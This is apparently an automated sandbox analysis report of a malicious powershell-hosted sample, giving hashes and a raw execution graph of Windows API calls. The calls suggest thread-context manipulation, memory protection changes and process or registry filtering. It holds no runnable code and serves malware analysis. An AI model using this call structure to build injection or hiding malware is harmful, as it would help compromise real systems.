                                                                                                                                  • Instruction ID: 8caf2ed7db68c86e064164f2f7b73994a75fe143a63fc14d1ada5819ab5a69fc
                                                                                                                                  • Opcode Fuzzy Hash: 301400cc170fefaaa3adda1eeb3efe0ba751c092febd3eaf905aa171128f7901
                                                                                                                                  • Instruction Fuzzy Hash: 8CB1287091CB488FE759FF68C4856B97BE1FFA5310F2001BED09AC3196DA25E846CB41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1667876134.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aed0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dbd1718b194d49d9a76a04b2c7614fb40519f57fbc3547e09c9a8762e0b3a616

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1393
Total number of Limit Nodes: 10
__CxxCallCatchBlock 9 API calls 8450->8451 8452 213bdceaba1 8451->8452 8465 213bdce96fc 8452->8465 8455 213bdce90e4 __CxxCallCatchBlock 9 API calls 8456 213bdceabd1 __CxxCallCatchBlock 8455->8456 8457 213bdce9738 __CxxCallCatchBlock 9 API calls 8456->8457 8462 213bdceac82 8457->8462 8458 213bdceacab __CxxCallCatchBlock 8459 213bdce90e4 __CxxCallCatchBlock 9 API calls 8458->8459 8460 213bdceacbe 8459->8460 8461 213bdce90e4 __CxxCallCatchBlock 9 API calls 8460->8461 8463 213bdceacc7 8461->8463 8462->8458 8464 213bdce8db8 __CxxCallCatchBlock 9 API calls 8462->8464 8464->8458 8466 213bdce90e4 __CxxCallCatchBlock 9 API calls 8465->8466 8467 213bdce970d 8466->8467 8468 213bdce9718 8467->8468 8469 213bdce90e4 __CxxCallCatchBlock 9 API calls 8467->8469 8470 213bdce90e4 __CxxCallCatchBlock 9 API calls 8468->8470 8469->8468 8471 213bdce9729 8470->8471 8471->8455 8471->8456 8585 213bdce3288 8586 213bdce32b8 8585->8586 8587 213bdce3371 8586->8587 8588 213bdce32d5 PdhGetCounterInfoW 8586->8588 8588->8587 8589 213bdce32f3 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8588->8589 8590 213bdce335d GetProcessHeap HeapFree 8589->8590 8591 213bdce3325 StrCmpW 8589->8591 8590->8587 8591->8590 8592 213bdce333a 8591->8592 8592->8590 8593 213bdce3720 12 API calls 8592->8593 8593->8592 8472 213bdcf3720 8482 213bdce8a60 8472->8482 8474 213bdcf3748 8476 213bdce90e4 __CxxCallCatchBlock 9 API calls 8477 213bdcf3758 8476->8477 8478 213bdce90e4 __CxxCallCatchBlock 9 API calls 8477->8478 8479 213bdcf3761 8478->8479 8480 213bdcec0b4 14 API calls 8479->8480 8481 213bdcf376a 8480->8481 8483 213bdce8a90 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8482->8483 8484 213bdce8b91 8483->8484 8485 213bdce8b54 RtlUnwindEx 8483->8485 8484->8474 8484->8476 8485->8483 8594 213bdcf04a0 8595 213bdcf04b9 8594->8595 8596 213bdcf04a9 8594->8596 8597 213bdcecfb4 __free_lconv_mon 13 API calls 8596->8597 8598 213bdcf04ae 8597->8598 8599 213bdcece0c _invalid_parameter_noinfo 38 API 
calls 8598->8599 8599->8595 8486 213bdce7d20 8487 213bdce7d41 8486->8487 8488 213bdce7d3c 8486->8488 8490 213bdce7e50 8488->8490 8491 213bdce7ee7 8490->8491 8492 213bdce7e73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8490->8492 8491->8487 8492->8491 8600 213bdce2aa0 8602 213bdce2ae6 8600->8602 8601 213bdce2b4c 8602->8601 8603 213bdce3d4c StrCmpNIW 8602->8603 8603->8602 8897 213bdcf441f 8898 213bdcf4437 8897->8898 8904 213bdcf44a2 8897->8904 8899 213bdce90e4 __CxxCallCatchBlock 9 API calls 8898->8899 8898->8904 8900 213bdcf4484 8899->8900 8901 213bdce90e4 __CxxCallCatchBlock 9 API calls 8900->8901 8902 213bdcf4499 8901->8902 8903 213bdcec0b4 14 API calls 8902->8903 8903->8904 8905 213bdcf461e 8906 213bdce90e4 __CxxCallCatchBlock 9 API calls 8905->8906 8907 213bdcf462c 8906->8907 8908 213bdcf4637 8907->8908 8909 213bdce90e4 __CxxCallCatchBlock 9 API calls 8907->8909 8909->8908 8604 213bdcef49c 8605 213bdcef4a8 8604->8605 8607 213bdcef4cf 8605->8607 8608 213bdcf19cc 8605->8608 8609 213bdcf19d1 8608->8609 8610 213bdcf1a0c 8608->8610 8611 213bdcf19f2 DeleteCriticalSection 8609->8611 8612 213bdcf1a04 8609->8612 8610->8605 8611->8611 8611->8612 8613 213bdced060 __free_lconv_mon 13 API calls 8612->8613 8613->8610 8910 213bdced418 8911 213bdced43d 8910->8911 8918 213bdced454 8910->8918 8912 213bdcecfb4 __free_lconv_mon 13 API calls 8911->8912 8914 213bdced442 8912->8914 8913 213bdced4e4 8916 213bdceb914 13 API calls 8913->8916 8915 213bdcece0c _invalid_parameter_noinfo 38 API calls 8914->8915 8917 213bdced44d 8915->8917 8919 213bdced53c 8916->8919 8918->8913 8926 213bdced49a 8918->8926 8928 213bdced576 8918->8928 8943 213bdced654 8918->8943 9005 213bdced7d8 8918->9005 8921 213bdced544 8919->8921 8931 213bdced597 8919->8931 8924 213bdced060 __free_lconv_mon 13 API calls 8921->8924 8923 213bdced5f6 8925 213bdced060 __free_lconv_mon 13 API calls 8923->8925 8927 213bdced54b 8924->8927 8929 213bdced601 8925->8929 8930 213bdced4bd 
8926->8930 8935 213bdced060 __free_lconv_mon 13 API calls 8926->8935 8927->8930 8936 213bdced060 __free_lconv_mon 13 API calls 8927->8936 8928->8930 8934 213bdced060 __free_lconv_mon 13 API calls 8928->8934 8933 213bdced61a 8929->8933 8937 213bdced060 __free_lconv_mon 13 API calls 8929->8937 8932 213bdced060 __free_lconv_mon 13 API calls 8930->8932 8931->8923 8931->8931 8940 213bdced63c 8931->8940 9042 213bdcf0c78 8931->9042 8932->8917 8938 213bdced060 __free_lconv_mon 13 API calls 8933->8938 8934->8928 8935->8926 8936->8927 8937->8929 8938->8917 8941 213bdcece2c _invalid_parameter_noinfo 17 API calls 8940->8941 8942 213bdced651 8941->8942 8944 213bdced682 8943->8944 8944->8944 8945 213bdced69e 8944->8945 8946 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 8944->8946 8945->8918 8947 213bdced6cd 8946->8947 8948 213bdced6e6 8947->8948 8949 213bdcf0c78 38 API calls 8947->8949 8950 213bdcf0c78 38 API calls 8948->8950 8952 213bdced7bc 8948->8952 8949->8948 8951 213bdced703 8950->8951 8951->8952 8954 213bdced73f 8951->8954 8955 213bdced722 8951->8955 8956 213bdced74d 8951->8956 8953 213bdcece2c _invalid_parameter_noinfo 17 API calls 8952->8953 8964 213bdced7d7 8953->8964 8958 213bdced060 __free_lconv_mon 13 API calls 8954->8958 8957 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 8955->8957 8959 213bdced737 8956->8959 9051 213bdceeca0 8956->9051 8961 213bdced72d 8957->8961 8958->8952 8959->8954 8963 213bdced060 __free_lconv_mon 13 API calls 8959->8963 8960 213bdced83a 8968 213bdced84c 8960->8968 8974 213bdced861 _invalid_parameter_noinfo 8960->8974 8965 213bdced060 __free_lconv_mon 13 API calls 8961->8965 8963->8954 8964->8960 9060 213bdcf1198 8964->9060 8965->8959 8966 213bdced775 8969 213bdced790 8966->8969 8970 213bdced77a 8966->8970 8971 213bdced654 52 API calls 8968->8971 8973 213bdced060 __free_lconv_mon 13 API calls 8969->8973 8972 213bdced060 __free_lconv_mon 13 API calls 8970->8972 9002 213bdced85c 8971->9002 8972->8959 8973->8954 8975 213bdcedb38 14 API 
calls 8974->8975 8977 213bdced8cb 8975->8977 8976 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8978 213bdcedb24 8976->8978 8979 213bdced8da 8977->8979 8980 213bdceef58 9 API calls 8977->8980 8978->8918 9069 213bdced0cc 8979->9069 8980->8979 8983 213bdced968 8984 213bdced654 52 API calls 8983->8984 8985 213bdced978 8984->8985 8987 213bdced060 __free_lconv_mon 13 API calls 8985->8987 8985->9002 8986 213bdcedb38 14 API calls 8996 213bdced992 8986->8996 8987->9002 8988 213bdceef58 9 API calls 8988->8996 8990 213bdced654 52 API calls 8990->8996 8991 213bdceda88 FindNextFileW 8993 213bdcedaa0 8991->8993 8991->8996 8992 213bdcedaea 8994 213bdcedaf8 FindClose 8992->8994 8997 213bdced060 __free_lconv_mon 13 API calls 8992->8997 8995 213bdcedacc FindClose 8993->8995 9113 213bdcf08e0 8993->9113 8998 213bdcedb08 8994->8998 8994->9002 9001 213bdcedadc 8995->9001 8995->9002 8996->8986 8996->8988 8996->8990 8996->8991 8996->8992 8999 213bdced060 13 API calls __free_lconv_mon 8996->8999 9091 213bdced26c 8996->9091 8997->8994 9003 213bdced060 __free_lconv_mon 13 API calls 8998->9003 8999->8996 9004 213bdced060 __free_lconv_mon 13 API calls 9001->9004 9002->8976 9003->9002 9004->9002 9006 213bdced83a 9005->9006 9007 213bdced818 9005->9007 9009 213bdced84c 9006->9009 9012 213bdced861 _invalid_parameter_noinfo 9006->9012 9007->9006 9008 213bdcf1198 38 API calls 9007->9008 9008->9007 9010 213bdced654 56 API calls 9009->9010 9011 213bdced85c 9010->9011 9014 213bdce7e30 _invalid_parameter_noinfo 8 API calls 9011->9014 9013 213bdcedb38 14 API calls 9012->9013 9015 213bdced8cb 9013->9015 9016 213bdcedb24 9014->9016 9017 213bdced8da 9015->9017 9018 213bdceef58 9 API calls 9015->9018 9016->8918 9019 213bdced0cc 16 API calls 9017->9019 9018->9017 9020 213bdced93b FindFirstFileExW 9019->9020 9021 213bdced968 9020->9021 9034 213bdced992 9020->9034 9022 213bdced654 56 API calls 9021->9022 9023 213bdced978 9022->9023 9023->9011 9025 213bdced060 __free_lconv_mon 13 API calls 9023->9025 9024 
213bdcedb38 14 API calls 9024->9034 9025->9011 9026 213bdceef58 9 API calls 9026->9034 9027 213bdced26c 16 API calls 9027->9034 9028 213bdced654 56 API calls 9028->9034 9029 213bdceda88 FindNextFileW 9031 213bdcedaa0 9029->9031 9029->9034 9030 213bdcedaea 9032 213bdcedaf8 FindClose 9030->9032 9035 213bdced060 __free_lconv_mon 13 API calls 9030->9035 9033 213bdcedacc FindClose 9031->9033 9038 213bdcf08e0 38 API calls 9031->9038 9032->9011 9036 213bdcedb08 9032->9036 9033->9011 9039 213bdcedadc 9033->9039 9034->9024 9034->9026 9034->9027 9034->9028 9034->9029 9034->9030 9037 213bdced060 13 API calls __free_lconv_mon 9034->9037 9035->9032 9040 213bdced060 __free_lconv_mon 13 API calls 9036->9040 9037->9034 9038->9033 9041 213bdced060 __free_lconv_mon 13 API calls 9039->9041 9040->9011 9041->9011 9045 213bdcf0c95 9042->9045 9043 213bdcf0c9a 9044 213bdcecfb4 __free_lconv_mon 13 API calls 9043->9044 9048 213bdcf0cb0 9043->9048 9046 213bdcf0ca4 9044->9046 9045->9043 9045->9048 9049 213bdcf0ce4 9045->9049 9047 213bdcece0c _invalid_parameter_noinfo 38 API calls 9046->9047 9047->9048 9048->8931 9049->9048 9050 213bdcecfb4 __free_lconv_mon 13 API calls 9049->9050 9050->9046 9052 213bdceecc2 9051->9052 9053 213bdceecdf 9051->9053 9052->9053 9054 213bdceecd0 9052->9054 9055 213bdceece9 9053->9055 9121 213bdcf17b0 9053->9121 9056 213bdcecfb4 __free_lconv_mon 13 API calls 9054->9056 9128 213bdcf1800 9055->9128 9059 213bdceecd5 _invalid_parameter_noinfo 9056->9059 9059->8966 9061 213bdcf11a0 9060->9061 9062 213bdcf11b5 9061->9062 9064 213bdcf11ce 9061->9064 9063 213bdcecfb4 __free_lconv_mon 13 API calls 9062->9063 9065 213bdcf11ba 9063->9065 9067 213bdcedb38 14 API calls 9064->9067 9068 213bdcf11c5 9064->9068 9066 213bdcece0c _invalid_parameter_noinfo 38 API calls 9065->9066 9066->9068 9067->9068 9068->8964 9070 213bdced11a 9069->9070 9071 213bdced0f6 9069->9071 9072 213bdced17f 9070->9072 9073 213bdced11f 9070->9073 9074 213bdced060 __free_lconv_mon 13 API calls 9071->9074 9076 
213bdced105 FindFirstFileExW 9071->9076 9075 213bdceea18 MultiByteToWideChar 9072->9075 9073->9076 9079 213bdced060 __free_lconv_mon 13 API calls 9073->9079 9083 213bdced134 9073->9083 9074->9076 9082 213bdced19b 9075->9082 9076->8983 9076->8996 9077 213bdcec390 14 API calls 9077->9076 9078 213bdced1a2 GetLastError 9080 213bdcecf44 13 API calls 9078->9080 9079->9083 9085 213bdced1af 9080->9085 9081 213bdced1e0 9081->9076 9084 213bdceea18 MultiByteToWideChar 9081->9084 9082->9078 9082->9081 9086 213bdced1d3 9082->9086 9087 213bdced060 __free_lconv_mon 13 API calls 9082->9087 9083->9077 9089 213bdced23a 9084->9089 9090 213bdcecfb4 __free_lconv_mon 13 API calls 9085->9090 9088 213bdcec390 14 API calls 9086->9088 9087->9086 9088->9081 9089->9076 9089->9078 9090->9076 9092 213bdced2ba 9091->9092 9093 213bdced296 9091->9093 9094 213bdced2c0 9092->9094 9095 213bdced31f 9092->9095 9097 213bdced060 __free_lconv_mon 13 API calls 9093->9097 9099 213bdced2a5 9093->9099 9098 213bdced2d5 9094->9098 9094->9099 9100 213bdced060 __free_lconv_mon 13 API calls 9094->9100 9096 213bdceeaa8 WideCharToMultiByte 9095->9096 9106 213bdced343 9096->9106 9097->9099 9101 213bdcec390 14 API calls 9098->9101 9099->8996 9100->9098 9101->9099 9102 213bdced34a GetLastError 9104 213bdcecf44 13 API calls 9102->9104 9103 213bdced387 9103->9099 9108 213bdceeaa8 WideCharToMultiByte 9103->9108 9105 213bdced357 9104->9105 9109 213bdcecfb4 __free_lconv_mon 13 API calls 9105->9109 9106->9102 9106->9103 9107 213bdced37b 9106->9107 9110 213bdced060 __free_lconv_mon 13 API calls 9106->9110 9111 213bdcec390 14 API calls 9107->9111 9112 213bdced3e9 9108->9112 9109->9099 9110->9107 9111->9103 9112->9099 9112->9102 9114 213bdcf0912 9113->9114 9115 213bdcecfb4 __free_lconv_mon 13 API calls 9114->9115 9120 213bdcf0927 _invalid_parameter_noinfo 9114->9120 9116 213bdcf091c 9115->9116 9117 213bdcece0c _invalid_parameter_noinfo 38 API calls 9116->9117 9117->9120 9118 213bdce7e30 _invalid_parameter_noinfo 8 API calls 
9119 213bdcf0c68 9118->9119 9119->8995 9120->9118 9122 213bdcf17d2 HeapSize 9121->9122 9123 213bdcf17b9 9121->9123 9124 213bdcecfb4 __free_lconv_mon 13 API calls 9123->9124 9125 213bdcf17be 9124->9125 9126 213bdcece0c _invalid_parameter_noinfo 38 API calls 9125->9126 9127 213bdcf17c9 9126->9127 9127->9055 9129 213bdcf181f 9128->9129 9130 213bdcf1815 9128->9130 9132 213bdcf1824 9129->9132 9138 213bdcf182b _invalid_parameter_noinfo 9129->9138 9131 213bdcec390 14 API calls 9130->9131 9137 213bdcf181d 9131->9137 9135 213bdced060 __free_lconv_mon 13 API calls 9132->9135 9133 213bdcf1831 9136 213bdcecfb4 __free_lconv_mon 13 API calls 9133->9136 9134 213bdcf185e HeapReAlloc 9134->9137 9134->9138 9135->9137 9136->9137 9137->9059 9138->9133 9138->9134 9139 213bdceb230 _invalid_parameter_noinfo 2 API calls 9138->9139 9139->9138 8178 213bdcebf98 8179 213bdcebfb1 8178->8179 8180 213bdcebfc9 8178->8180 8179->8180 8181 213bdced060 __free_lconv_mon 13 API calls 8179->8181 8181->8180 7563 213bdce2214 NtQuerySystemInformation 7564 213bdce2250 7563->7564 7565 213bdce235b 7564->7565 7572 213bdce2269 7564->7572 7576 213bdce2326 7564->7576 7566 213bdce23cf 7565->7566 7567 213bdce2360 7565->7567 7569 213bdce23d4 7566->7569 7566->7576 7583 213bdce3398 GetProcessHeap HeapAlloc 7567->7583 7571 213bdce3398 11 API calls 7569->7571 7570 213bdce22a1 StrCmpNIW 7570->7572 7574 213bdce2378 7571->7574 7572->7570 7573 213bdce22c8 7572->7573 7572->7576 7573->7572 7577 213bdce1d2c 7573->7577 7574->7574 7574->7576 7578 213bdce1db0 7577->7578 7579 213bdce1d53 GetProcessHeap HeapAlloc 7577->7579 7578->7573 7579->7578 7580 213bdce1d8e 7579->7580 7589 213bdce1cf8 7580->7589 7587 213bdce33eb 7583->7587 7584 213bdce34a9 GetProcessHeap HeapFree 7584->7574 7585 213bdce34a4 7585->7584 7586 213bdce3436 StrCmpNIW 7586->7587 7587->7584 7587->7585 7587->7586 7588 213bdce1d2c 6 API calls 7587->7588 7588->7587 7590 213bdce1d18 GetProcessHeap HeapFree 7589->7590 7591 213bdce1d0f 7589->7591 7590->7578 7592 213bdce1530 
2 API calls 7591->7592 7592->7590 8614 213bdceae94 8621 213bdceadc7 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8614->8621 8615 213bdceaebb 8616 213bdce90e4 __CxxCallCatchBlock 9 API calls 8615->8616 8618 213bdceaec0 8616->8618 8617 213bdceaecb __FrameHandler3::GetHandlerSearchState 8618->8617 8619 213bdce90e4 __CxxCallCatchBlock 9 API calls 8618->8619 8619->8617 8620 213bdce978c 9 API calls Is_bad_exception_allowed 8620->8621 8621->8615 8621->8617 8621->8620 8623 213bdce97b4 8621->8623 8624 213bdce90e4 __CxxCallCatchBlock 9 API calls 8623->8624 8625 213bdce97c2 8624->8625 8625->8621 9140 213bdce8432 9141 213bdce8e80 __std_exception_copy 38 API calls 9140->9141 9142 213bdce845d 9141->9142 8493 213bdcef130 VirtualProtect 9143 213bdcef630 9144 213bdcef660 9143->9144 9147 213bdcef687 9143->9147 9145 213bdcec8d0 __free_lconv_mon 13 API calls 9144->9145 9144->9147 9149 213bdcef674 9144->9149 9145->9149 9146 213bdcef75c 9150 213bdcef78a 9146->9150 9151 213bdcef873 9146->9151 9164 213bdcef7c3 9146->9164 9147->9146 9166 213bdcec318 EnterCriticalSection 9147->9166 9149->9147 9152 213bdcef709 9149->9152 9160 213bdcef6c4 9149->9160 9159 213bdcec870 _invalid_parameter_noinfo 14 API calls 9150->9159 9150->9164 9153 213bdcef880 9151->9153 9168 213bdcec36c LeaveCriticalSection 9151->9168 9154 213bdcecfb4 __free_lconv_mon 13 API calls 9152->9154 9157 213bdcef70e 9154->9157 9158 213bdcece0c _invalid_parameter_noinfo 38 API calls 9157->9158 9158->9160 9161 213bdcef7b3 9159->9161 9163 213bdcec870 _invalid_parameter_noinfo 14 API calls 9161->9163 9162 213bdcef821 9165 213bdcec870 14 API calls _invalid_parameter_noinfo 9162->9165 9163->9164 9164->9162 9167 213bdcec36c LeaveCriticalSection 9164->9167 9165->9162 9169 213bdce242c GetProcessIdOfThread GetCurrentProcessId 9170 213bdce24d2 9169->9170 9171 213bdce2457 CreateFileW 9169->9171 9171->9170 9172 213bdce248b WriteFile ReadFile CloseHandle 9171->9172 9172->9170 8182 213bdceb5aa 8194 213bdcec0b4 8182->8194 8195 
213bdcec870 _invalid_parameter_noinfo 14 API calls 8194->8195 8196 213bdcec0bd 8195->8196 8197 213bdce61a3 8198 213bdce61b0 8197->8198 8199 213bdce61bc GetThreadContext 8198->8199 8206 213bdce631a 8198->8206 8200 213bdce61e2 8199->8200 8199->8206 8205 213bdce6209 8200->8205 8200->8206 8201 213bdce6341 VirtualProtect FlushInstructionCache 8201->8206 8202 213bdce63fe 8203 213bdce641e 8202->8203 8215 213bdce48e0 8202->8215 8219 213bdce52f0 GetCurrentProcess 8203->8219 8207 213bdce628d 8205->8207 8209 213bdce6266 SetThreadContext 8205->8209 8206->8201 8206->8202 8209->8207 8210 213bdce6477 8213 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8210->8213 8211 213bdce6437 ResumeThread 8212 213bdce6423 8211->8212 8212->8210 8212->8211 8214 213bdce64bf 8213->8214 8217 213bdce48fc 8215->8217 8216 213bdce495f 8216->8203 8217->8216 8218 213bdce4912 VirtualFree 8217->8218 8218->8217 8220 213bdce530c 8219->8220 8221 213bdce5322 VirtualProtect FlushInstructionCache 8220->8221 8222 213bdce5353 8220->8222 8221->8220 8222->8212 8223 213bdcef1a4 8224 213bdcef1dd 8223->8224 8225 213bdcef1ae 8223->8225 8225->8224 8226 213bdcef1c3 FreeLibrary 8225->8226 8226->8225 8227 213bdcf31a4 8228 213bdcf31bb 8227->8228 8229 213bdcf31b5 CloseHandle 8227->8229 8229->8228 7458 213bdce1bc0 7465 213bdce1724 GetProcessHeap HeapAlloc 7458->7465 7460 213bdce1bd6 SleepEx 7461 213bdce1724 50 API calls 7460->7461 7463 213bdce1bcf 7461->7463 7463->7460 7464 213bdce159c StrCmpIW StrCmpW 7463->7464 7516 213bdce19b0 7463->7516 7464->7463 7533 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7533 7467 213bdce174c 7534 213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7534 7469 213bdce1754 7535 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7535 7471 213bdce175d 7536 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7536 7473 213bdce1766 7537 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7537 7475 213bdce176f 7538 
213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7538 7477 213bdce1778 7539 213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7539 7479 213bdce1781 7540 213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7540 7481 213bdce178a RegOpenKeyExW 7482 213bdce19a2 7481->7482 7483 213bdce17bc RegOpenKeyExW 7481->7483 7482->7463 7484 213bdce17fb RegOpenKeyExW 7483->7484 7485 213bdce17e5 7483->7485 7487 213bdce181f 7484->7487 7488 213bdce1836 RegOpenKeyExW 7484->7488 7541 213bdce12b8 RegQueryInfoKeyW 7485->7541 7550 213bdce104c RegQueryInfoKeyW 7487->7550 7491 213bdce1871 RegOpenKeyExW 7488->7491 7492 213bdce185a 7488->7492 7493 213bdce18ac RegOpenKeyExW 7491->7493 7494 213bdce1895 7491->7494 7496 213bdce12b8 16 API calls 7492->7496 7498 213bdce18d0 7493->7498 7499 213bdce18e7 RegOpenKeyExW 7493->7499 7497 213bdce12b8 16 API calls 7494->7497 7500 213bdce1867 RegCloseKey 7496->7500 7501 213bdce18a2 RegCloseKey 7497->7501 7502 213bdce12b8 16 API calls 7498->7502 7503 213bdce1922 RegOpenKeyExW 7499->7503 7504 213bdce190b 7499->7504 7500->7491 7501->7493 7505 213bdce18dd RegCloseKey 7502->7505 7507 213bdce195d RegOpenKeyExW 7503->7507 7508 213bdce1946 7503->7508 7506 213bdce104c 6 API calls 7504->7506 7505->7499 7511 213bdce1918 RegCloseKey 7506->7511 7509 213bdce1981 7507->7509 7510 213bdce1998 RegCloseKey 7507->7510 7512 213bdce104c 6 API calls 7508->7512 7513 213bdce104c 6 API calls 7509->7513 7510->7482 7511->7503 7514 213bdce1953 RegCloseKey 7512->7514 7515 213bdce198e RegCloseKey 7513->7515 7514->7507 7515->7510 7560 213bdce14a0 7516->7560 7533->7467 7534->7469 7535->7471 7536->7473 7537->7475 7538->7477 7539->7479 7540->7481 7542 213bdce1486 RegCloseKey 7541->7542 7543 213bdce1323 GetProcessHeap HeapAlloc 7541->7543 7542->7484 7544 213bdce1472 GetProcessHeap HeapFree 7543->7544 7545 213bdce134e RegEnumValueW 7543->7545 7544->7542 7547 213bdce13a1 7545->7547 7547->7544 7547->7545 7548 213bdce13cf GetProcessHeap HeapAlloc 
GetProcessHeap HeapFree 7547->7548 7549 213bdce141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7547->7549 7555 213bdce1530 7547->7555 7548->7549 7549->7547 7551 213bdce10bf 7550->7551 7552 213bdce11b5 RegCloseKey 7550->7552 7551->7552 7553 213bdce10cf RegEnumValueW 7551->7553 7554 213bdce114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7551->7554 7552->7488 7553->7551 7554->7551 7556 213bdce154a 7555->7556 7557 213bdce1580 7555->7557 7556->7557 7558 213bdce1561 StrCmpIW 7556->7558 7559 213bdce1569 StrCmpW 7556->7559 7557->7547 7558->7556 7559->7556 7561 213bdce14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7560->7561 7562 213bdce14c2 GetProcessHeap HeapFree 7560->7562 7562->7561 7562->7562 8230 213bdcebf40 8233 213bdcebcf8 8230->8233 8240 213bdcebcc0 8233->8240 8241 213bdcebcd0 8240->8241 8242 213bdcebcd5 8240->8242 8243 213bdcebc7c 13 API calls 8241->8243 8244 213bdcebcdc 8242->8244 8243->8242 8245 213bdcebcf1 8244->8245 8246 213bdcebcec 8244->8246 8248 213bdcebc7c 8245->8248 8247 213bdcebc7c 13 API calls 8246->8247 8247->8245 8249 213bdcebc81 8248->8249 8250 213bdcebcb2 8248->8250 8251 213bdcebcaa 8249->8251 8252 213bdced060 __free_lconv_mon 13 API calls 8249->8252 8253 213bdced060 __free_lconv_mon 13 API calls 8251->8253 8252->8249 8253->8250 8494 213bdceb2c0 8499 213bdcec318 EnterCriticalSection 8494->8499 8629 213bdcf363c 8630 213bdcf3674 __GSHandlerCheckCommon 8629->8630 8631 213bdcf36a0 8630->8631 8633 213bdce97e4 8630->8633 8634 213bdce90e4 __CxxCallCatchBlock 9 API calls 8633->8634 8635 213bdce980e 8634->8635 8636 213bdce90e4 __CxxCallCatchBlock 9 API calls 8635->8636 8637 213bdce981b 8636->8637 8638 213bdce90e4 __CxxCallCatchBlock 9 API calls 8637->8638 8639 213bdce9824 8638->8639 8639->8631 9173 213bdcec9bc 9178 213bdcef160 9173->9178 9175 213bdcec9c5 9176 213bdcec8d0 __free_lconv_mon 13 API calls 9175->9176 9177 213bdcec9e2 __vcrt_uninitialize_ptd 9175->9177 9176->9177 9179 213bdcef175 9178->9179 9180 213bdcef171 9178->9180 9179->9180 9181 
213bdceed48 9 API calls 9179->9181 9180->9175 9181->9180 9182 213bdce3fb9 9185 213bdce3f06 _invalid_parameter_noinfo 9182->9185 9183 213bdce3f70 9184 213bdce3f56 VirtualQuery 9184->9183 9184->9185 9185->9183 9185->9184 9186 213bdce3f8a VirtualAlloc 9185->9186 9186->9183 9187 213bdce3fbb GetLastError 9186->9187 9187->9185 9188 213bdce5db9 9189 213bdce5dc0 VirtualProtect 9188->9189 9190 213bdce5de9 GetLastError 9189->9190 9191 213bdce5cd0 9189->9191 9190->9191 8500 213bdce2cb8 8502 213bdce2d15 8500->8502 8501 213bdce2d30 8502->8501 8503 213bdce3678 3 API calls 8502->8503 8503->8501 8504 213bdcf44b5 8505 213bdce90e4 __CxxCallCatchBlock 9 API calls 8504->8505 8506 213bdcf44cd 8505->8506 8507 213bdce90e4 __CxxCallCatchBlock 9 API calls 8506->8507 8508 213bdcf44e8 8507->8508 8509 213bdce90e4 __CxxCallCatchBlock 9 API calls 8508->8509 8510 213bdcf44fc 8509->8510 8511 213bdce90e4 __CxxCallCatchBlock 9 API calls 8510->8511 8512 213bdcf453e 8511->8512 8254 213bdce5734 8255 213bdce573a 8254->8255 8266 213bdce7d60 8255->8266 8259 213bdce579e 8261 213bdce5837 _invalid_parameter_noinfo 8261->8259 8263 213bdce59bd 8261->8263 8279 213bdce7940 8261->8279 8262 213bdce5abb 8263->8262 8264 213bdce5b37 VirtualProtect 8263->8264 8264->8259 8265 213bdce5b63 GetLastError 8264->8265 8265->8259 8267 213bdce7d6b 8266->8267 8268 213bdce577d 8267->8268 8269 213bdceb230 _invalid_parameter_noinfo 2 API calls 8267->8269 8270 213bdce7d8a 8267->8270 8268->8259 8275 213bdce41c0 8268->8275 8269->8267 8271 213bdce7d95 8270->8271 8285 213bdce8578 8270->8285 8289 213bdce8598 8271->8289 8276 213bdce41dd 8275->8276 8278 213bdce424c _invalid_parameter_noinfo 8276->8278 8298 213bdce4430 8276->8298 8278->8261 8280 213bdce7987 8279->8280 8323 213bdce7710 8280->8323 8283 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8284 213bdce79b1 8283->8284 8284->8261 8286 213bdce8586 std::bad_alloc::bad_alloc 8285->8286 8293 213bdce8f38 8286->8293 8288 213bdce8597 8290 213bdce85a6 std::bad_alloc::bad_alloc 8289->8290 
8291 213bdce8f38 Concurrency::cancel_current_task 2 API calls 8290->8291 8292 213bdce7d9b 8291->8292 8294 213bdce8f57 8293->8294 8295 213bdce8fa2 RaiseException 8294->8295 8296 213bdce8f80 RtlPcToFileHeader 8294->8296 8295->8288 8297 213bdce8f98 8296->8297 8297->8295 8299 213bdce4477 8298->8299 8300 213bdce4454 8298->8300 8301 213bdce44ad 8299->8301 8318 213bdce4010 8299->8318 8300->8299 8312 213bdce3ee0 8300->8312 8304 213bdce4010 2 API calls 8301->8304 8305 213bdce44dd 8301->8305 8304->8305 8306 213bdce3ee0 3 API calls 8305->8306 8309 213bdce4513 8305->8309 8306->8309 8307 213bdce3ee0 3 API calls 8310 213bdce452f 8307->8310 8308 213bdce4010 2 API calls 8311 213bdce454b 8308->8311 8309->8307 8309->8310 8310->8308 8310->8311 8311->8278 8317 213bdce3f01 _invalid_parameter_noinfo 8312->8317 8313 213bdce3f70 8313->8299 8314 213bdce3f56 VirtualQuery 8314->8313 8314->8317 8315 213bdce3f8a 